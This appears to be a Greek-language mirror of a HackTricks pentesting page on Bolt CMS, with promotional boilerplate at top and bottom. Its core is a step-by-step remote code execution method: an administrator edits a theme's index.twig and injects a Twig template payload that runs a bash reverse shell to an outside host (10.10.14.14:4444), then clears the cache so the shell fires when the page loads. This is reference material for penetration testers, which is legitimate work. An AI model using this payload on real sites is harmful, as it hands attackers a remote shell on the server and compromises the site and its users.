mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 08:01:00 +00:00
4.2 KiB
4.2 KiB
Bolt CMS
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
RCE
Μετά την είσοδο ως διαχειριστής (πηγαίνετε στο /bot για να αποκτήσετε την προτροπή σύνδεσης), μπορείτε να αποκτήσετε RCE στο Bolt CMS:
- Επιλέξτε
Configuration->View Configuration->Main Configurationή πηγαίνετε στη διεύθυνση URL/bolt/file-edit/config?file=/bolt/config.yaml - Ελέγξτε την τιμή του θέματος
- Επιλέξτε
File management->View & edit templates - Επιλέξτε τη βάση του θέματος που βρέθηκε στο προηγούμενο βήμα (
base-2021σε αυτή την περίπτωση) και επιλέξτεindex.twig - Στην περίπτωσή μου, αυτό είναι στη διεύθυνση URL /bolt/file-edit/themes?file=/base-2021/index.twig
- Ορίστε το payload σας σε αυτό το αρχείο μέσω template injection (Twig), όπως:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - Και αποθηκεύστε τις αλλαγές
- Καθαρίστε την κρυφή μνήμη στο
Maintenance->Clear the cache - Αποκτήστε ξανά πρόσβαση στη σελίδα ως κανονικός χρήστης, και το payload θα πρέπει να εκτελείται
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.